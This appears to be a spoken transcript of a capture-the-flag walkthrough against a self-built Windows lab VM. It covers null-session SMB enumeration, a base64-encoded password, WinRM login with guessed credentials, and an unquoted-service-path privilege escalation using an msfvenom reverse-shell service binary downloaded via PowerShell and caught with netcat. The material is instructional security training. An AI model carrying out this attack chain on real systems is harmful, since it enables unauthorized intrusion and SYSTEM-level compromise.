Hey guys, this is the first in a series of videos of me solving the CTF challenges for the client-side CTF VM that I put out. So for this first one, what I'm going to do is I'm going to show you how to get the foothold using the remoting service that's running on the machine in order to get a foothold on there. And then I'm also going to show you how to do privilege escalation through an unquoted service path, how to, one, identify it, and number two, how to actually achieve the privilege escalation. Now, the goal for this set of videos is for me to show you how to do this as a remote attacker. So without actually having the box in front of me and without actually running the Windows interface, I'm going to try to compromise this machine, get a session on it, and then figure out how to get the rest of the information that I need to be able to compromise it, to get my privileges all the way up to the NT system level, which is the highest level of privileges that you can get on a Windows computer. So the first thing that we always want to do is we always want to take a look at the different ports that are running. And for this series of videos, I'm not going to try to focus too much on the tools that I'm using. If you'd like to learn about these tools, I would love to teach you about the tools. Me and any of the other information security engineers would be happy to teach about the tools. What I want to focus on is the vulnerability classes, show the exploitation, not dig too deep into the tools. But if you have any questions, like I said, reach out to me after. So we'd want to do a port scan of the machine using a tool called Nmap. I've already done it because it can take a while. So let's just take a look at the results of the port scan and see what is open on this machine. So we see 135, which is MSRPC, which is Windows RPC. We see 139, which is NetBIOS. And 139 and 445 together are Samba, SMB, file sharing. 3389 is Windows RDP. 5357, 5985, 47001. I don't recognize these sets, so these are MSRPC ports. Nothing too interesting here. But what I don't recognize is this three set of ports. So it's all HTTP. That's really strange. So let's look up Windows port 47001. Port 47001. Oh, Windows Remote Management Service. So WinRM. Cool. So WinRM is actually, let's take a look. Make sure WinRM and TCP, HTTP base 47001, 5985, 5986. Okay, cool. So what WinRM is, that means that if we can get someone who has sufficient credentials, we can use WinRM to start a remote session on here. And using that remote session, we can do various things, hopefully elevate our privileges all the way up to the top. Let's take a look at what we got. So this says this is Windows 10 Enterprise. The computer name is devctf. It's part of a work group. It's not joined to any domain, which is good. SMB security mode, we used a guest account. User level authentication is supported. Challenge response is supported. Message signing is disabled. Okay. For this, because we're not going to be relaying anything and because we're not using any of those kind of exploits, it doesn't really matter. So let's take a look at SMB. So let's say SMB client -L, and just so you guys know, the IP address that I'm going to be hitting is going to be changing throughout the video because for some reason my router loves to reprovision the IP address of this VM, and it changes like every, I don't know, 15, 20 minutes. So throughout the course of a single video, it might change a lot. So don't pay too much attention to the IP address, and you might have to look for the IP address on your own if you're going to do it remotely. So let's say I want to list the shares that are on this machine, and right now it has an IP address of 192.168.0.92, and I think my slashes are the wrong direction. 1, 2, 3, 4. Maybe my slashes were not the wrong direction. Okay, so let's do SMB client -L 1, 2, 3, 4 192.168.0.92. And the user we're going to use is no one, so a null user, and we'll say no password. And we look and we say, okay, interesting. So this does allow the null user, so no user, no password, to connect and take a look at the shares on here. So we see admin $, C$, IPC $. Those are default Windows shares. We're unlikely to be able to access those, so it's unlikely that we could get into those without some sort of elevated permission. Shared scripts is not standard. Users is standard. Shared scripts, that looks weird. So let's see if we can connect to shared scripts as this null user. And I might have got re-IP addressed in the middle of that thing. I did not. Okay. And that tells me that my slashes are probably the bad way, the wrong way around. Which is funny because SMB client for listing shares doesn't care as much, but when you're actually connecting to shares, it matters. And that was the issue. Okay, so now we connected with no username and no password. So that is a big misconfiguration. And we see a file called cleanup.bat. So let's get cleanup.bat. Let's take a look at the content of that file. So it's a batch file, so rem means that there's a comment in here. This is a work in progress. For right now, I am just storing my password encrypted for future use. So the command that we're running in this batch file is PowerShell.exe and then tac e. So whoever wrote this script, the bad dev that wrote this script thought that this was encrypted, but actually PowerShell.exe tac e is just a base64 encoded command. So then what we can do here is we can just say, okay, we'll just echo this and base64 decode it. And we see low privs. Okay. So we know that the password is low privs now. Now I created this machine, so I already knew the usernames and passwords, but what we're trying to do is take a look at it from an attacker's perspective. These are types of misconfigurations that you would see, and these are all misconfigurations that I have seen inside of our networks and in our applications. I have seen shares where anyone can connect without credentials that have passwords in them that are similar to this. So this may seem trivial and bad, but this is the truth of what I have seen out there. So we know that that is a valid password. So let's take a look at the other. Let's take a look here. Let's put low privs into our passwords file, so we can cat passwords. So we have a password potentially, but we don't have a username. So what we should probably do is try to connect to here with a username of administrator and with a password of low privs. So that worked, but we also know that anyone with anything, any kind of privileges can connect to that. So let's try a different share. Let's try C dollar. Okay, so can't do it. That's the wrong password for the user administrator. And then let's try users with the user of administrator. So we can connect here, but I have a feeling, yeah. So we can connect here, but we don't see anything. We don't see any actual users on this box. We see default and we see public, which tells me that we're not actually seeing all the things that are here. So let's disconnect there, and let's say the user is going to be, let's try username the same as password, because sometimes people do that. So let's say the username is low privs, and the password is low privs. And now we see it. Okay. So now we know users, we know low privs, we know standard, and that looks like it. So it looks like we've got two users on this machine, and so we can v credentials, and we know that we have one good set of credentials, low privs and low privs. Okay, so now let's try to do the same thing, and let's say maybe they're just as bad for the standard user. So we tried standard, didn't work. So we do have low privs. Now, if we go back to our, if we go back and look at our port scan, if we remember correctly, WinRM is open. So this low privs, guessing just by the name, probably doesn't have too many privileges, but we can try to see if we can connect through WinRM to this machine as a low privs user. Let's see if they have left it in a state that anyone can connect over WinRM. So we're going to use a tool called evil WinRM. We're going to say the IP address is the IP address of our victim machine, which is 992.168.0.92. And then the user is low privs, and the password is low privs. and we can see we actually got a connection. So we got a connection as a low privs user. We start out in their documents folder. Let's take a look, and we see user.txt. So that's one of the flags we needed to get for the CTF, right? We needed to get user.txt as a flag for the CTF. So let's say, let's say vuser.txt, because we want to save whatever the content of user.txt is here. So let's get content of user.txt, and here it is. It looks like it's an MD5 hash. And now we have our flag for user.txt that's saved, and we could write up how this was a vulnerability, what misconfigurations led to this, right? So default allowing SMB with null sessions allowed us to use WinRM that was exposed. WinRM shouldn't be exposed, typically only inside of a domain network where it's strongly secured. And WinRM was exposed to everybody, so everybody could log in through WinRM. And we were able to find that password because they saved it in an encoded format on a share. Again, these are all things that I have seen in our networks and in other networks that I've looked at. So these are real vulnerabilities that lead to real problems. So now let's take a look at what else is on this machine. So let's take a look at all the users. So low privs, public and standard. Okay, so we can see from before on SMB that these are all the users that exist. So then what we need to do next is let's see what's installed on this machine. So let's look at, let's come in here, we'll say, okay, let's take a look at what's installed. We've got a folder called DevTools, perflogs, program files, and program files x86. So this is good information. No, this is a 64-bit OS, right? 64-bit machine, 64-bit OS, shared scripts, which is where we already were. So let's take a look at shared scripts. Let's make sure there was nothing in there that was interesting or hidden. Nope, just that one thing. So then let's take a look at DevTools, because that looks non-standard. And there's nothing in here, so that's completely empty. And now let's take a look at CD. Let's go into program files. And let's see, common files. We're looking for anything out of the ordinary, nothing out of the ordinary here. And so then let's go over to program files x86, and it looks like my machine might have just gotten its IP address changed, so that's why we're getting this lovely hang, and it did get its IP address changed, so we're going to have to exit out of here. Okay, so we got re-IP address down to 20. For some strange reason, my router really does not like this VM. So we're going to program files x86 because we'd already looked at program files and there's nothing there. So we want to go to CD program files x86 and let's take a look. So we've got common files, Internet Explorer. Looking for anything interesting here, Microsoft.net. This stands out. So vulnerable service. So let's take some notes here. Okay, so we've got this file called vulnerable service. So let's go take a look at what's inside of there. And we've got a directory called vulnerable service exercise. So let's go. And we've got a vulnerable service.exe. Okay, so this is likely running as a Windows service because it's vulnerable service, right? So we've got this thing called vulnerable service that seems to be running. So inside of there, we've got an exe named vulnerable service.exe, right? So now what we need to do is we need to find the name of that service. So let's try to do net start. Access is denied. So net stop sc.exe query. Access is denied. So we cannot run just normal queries against the the service controller to see what's there. So instead what we're going to do is we're going to go to the registry and see if we can take a look around the registry. So we're going to go to the registry. Whoops, typo there, HKey local machine. And now we're in the registry. And so now if we get child items of this, we have software and we have system. So we want to go to system. Then we get child item. And that is current control set is where we want to go next. So current control set. then get child items. And then we want to go to services. And we want to do get child items here, and we realize, holy cow, there's a ton of child items inside of services. So what we actually want to do is let's just write a quick PowerShell script to do services. Let's just do this. Let's just do get item property. We want to say the path to where we are is HKey local machine, and then we are at system. We are at current control set, and then we are at services. We want to say everything inside of here, and then what we want to do is we want to select something. So what do we want to select? What is going to be the thing that's the most helpful? Probably the service name, because what we want to do is look for anything that has a weird service name that looks non-standard for Windows. Like, see, WWAN service, Windows Update service. These are things that are standard Windows things, so we don't care about them. And so what we want to do is we want to look for something that says, where am I looking at here? We want to look for something, for some way to filter by those, and then we can take a look at what we want. So we want to select PS child name. Okay, now we have a list of just all the services that are running on this machine. So this is still a lot of services to go through. But because we already know that machine, that exe was called vulnerable service, we can take a guess. You can take a guess that this is probably going to be named vulnerable service, and we might be right. So VU vulnerable service, and there it is. It's right there, vulnerable service. Okay, so now we want to do sc.exe, and we want to do qc, and then vulnerable service. Let's take a look at it. And look at this. Okay, so it's a Win32, auto starts, normal error control, the binary path name, and this is where the magic is here. The display name is vulnerable service, starts as local system. Okay, so the magic here is that because this thing has a path with spaces in it, but it is not quoted, so there's no quotes around it, what Windows will try to do is Windows will say, okay, starting left to right, let's walk our way down and try to find this executable. It's going to walk down, and it's going to stop every time there's a space. And it's going to look for the preceding argument in here, .exe, every time that there's a space until we get to the very end of that path. So it's going to go to C:/ and try to execute program.exe. And then it's going to go to C program files x86 vulnerable service and try to execute, sorry, it's going to go to C program files x86 and try to execute vulnerable.exe or vulnerable.exe. And then it's going to go to C program files x86 vulnerable service and try to execute vulnerable.exe. So we have 3 chances. 1, 2, 3 chances to try to see if we can hijack the execution of this. So what we need to do is we need to see if we can write to the C drive. Then we need to see if we can write to C program files x86. Then we need to see if we can write to C program files x86 vulnerable service. And then we need to see if we can write to vulnerable service exercise. So this would, if we could write to here vulnerable service exercise, that's a different vulnerability because then we would just override the vulnerable service exe. So for the unquoted service path vulnerability, we have 1, 2, 3 tries to try to overwrite this. So what we want to do is we want to go to C:// and now we're back there, and we should make a note of this so we know, right? Copy this. So it's an unquoted service path, and that's the full one that we need to keep, that we need to try to hijack. So that's cat notes, so we can just see it. Okay, so when we want to go to the C drive, now we're at the C drive. Let's see what's in the C drive again. Let's see if we can echo test into test.txt. And we cannot. Unauthorized access exception. So let's go to CD program files, x86, Let's take a look inside of here. Now, same thing, echo test into test.text and unauthorized access exception. So the reason what we're trying to do is essentially say, can I write to this folder? Because if I can write to this folder, then I can drop my malicious program in there and I can get execution, right? So then we need to go to cd vulnerable service. Cool, now we need to do the same thing. So we're gonna say echo test.text into test.text, and it looks like it worked. It did. So if we get content of test.text, we can see that we have successfully created that. So let's get rid of test.text. And now what we need to do is we need to generate a payload. So we need to generate a payload that when run is going to hijack the service and give us execution of that service job as the NT system user on that machine. So we're going to get that to redirect execution back to us, give us a reverse shell as an NT system user. So we've got a couple things we need to do. So we need to generate our payload. So we need to do MSF Venom to generate our payload. Our payload is going to be Windows. We want shell and reverse, and we want it to be TCP. And then we're going to say the L host is, and I don't know what our IP address is. I think it's, let's check. I believe it's 192.168.0.52, and it is. So L host is 192.168.0.52, and L port. The port we want to connect back on is, let's say, let's do 31337 because we are elite. And the format is an exe service because we want this to be a service so that our shell won't immediately die. And you guys can look that up, or I can explain it more to you another time if you want, because we're hijacking a service. So if we just did a straight exe as our format right here, then it wouldn't work. So it needs to be an exe service. And we want this to be called, now it has to be called vulnerable.exe because it has to hijack this path right here. So we're in the vulnerable service, I believe. Yep, this is where we are. So we're in this folder. We need to hijack this one, which is the next one down. So it needs to be called vulnerable.exe. Let's run that. So it generates our payload. And while we're waiting for that payload, what we're going to do is we're going to set up a server up here, an HTTP server that's going to wait for us to be able to connect so that we can download our file. So now we have a server waiting here for us to be able to download our file. And now we have this, and now we have file vulnerable.exe. So we've got our Windows file here, and it looks like it generated successfully 192.168.0.52. That's us. And then what we need to do now is we need to wait for a connection. So we set up our connection listener. We're using netcat, and we're going to do port 31337. Okay, so now we've got that listening. So now what we need to do back here is we are in here. So what we need to do is we need to download that file. So we're going to go IEX new object net.web client. We're going to say .download file, and the file source is HTTP 192.168.0.52, and then it's vulnerable.exe. And then the next thing we have to do is state the destination. So C:\/ program files x86, then the vulnerable service, and we're going to call it vulnerable.exe. There we go. Now let's see if we've got it. We do. So our vulnerable.exe is here. Now, in order for us to be able to exploit this vulnerability, we would need to be able to either A, restart the machine, or B, restart the service. Now, to make this a little bit easier on ourselves, I made it so that we could just restart the service. So let's take a look at our privileges. So let's say, who am I dash priv/priv, right? So you can see we can shut down the machine and restart it. But in order to make this a little bit easier on myself so I didn't have to shut it down, worry about re-IP addressing in the middle of it shutting down and restarting, I just gave us the rights to be able to restart the service. But you see we have the shutdown privilege, which almost everybody has. So if we could shut this computer down with a restart flag, when it came back up, we should get code execution as NT system. So we're not going to do that. We're just going to start the service. So we're going to stop the service. So we're going to do stop service vulnerable service. And it looks like it worked. Then we're going to do start service vulnerable service. And if all goes well, we now have a connection back to us. You'll see that it came back from 192.168.0.20 on an ephemeral port, and it connected back to us, and we see who am I? We are now the NT Authority system user. So because we have that unquoted service path, and because we were able to gain remote access through WinRM with a bad password, right? Username and password, same combination is bad. We were able to get command execution remotely on that machine through WinRM, and then we were able to elevate our privileges up to the highest level of user, so even beyond user level into NT Authority system level through an unquoted service path vulnerability. Again, these are all things that I've seen throughout our organization. These are all vulnerabilities that we have, and I hope this gives you some insight into how an attacker could take this information and get code execution and get persistence. So the next one that we're going to do, next we're going to do some other privilege escalation, look for some other bad configurations and stuff like that, and I'll see you in the next video.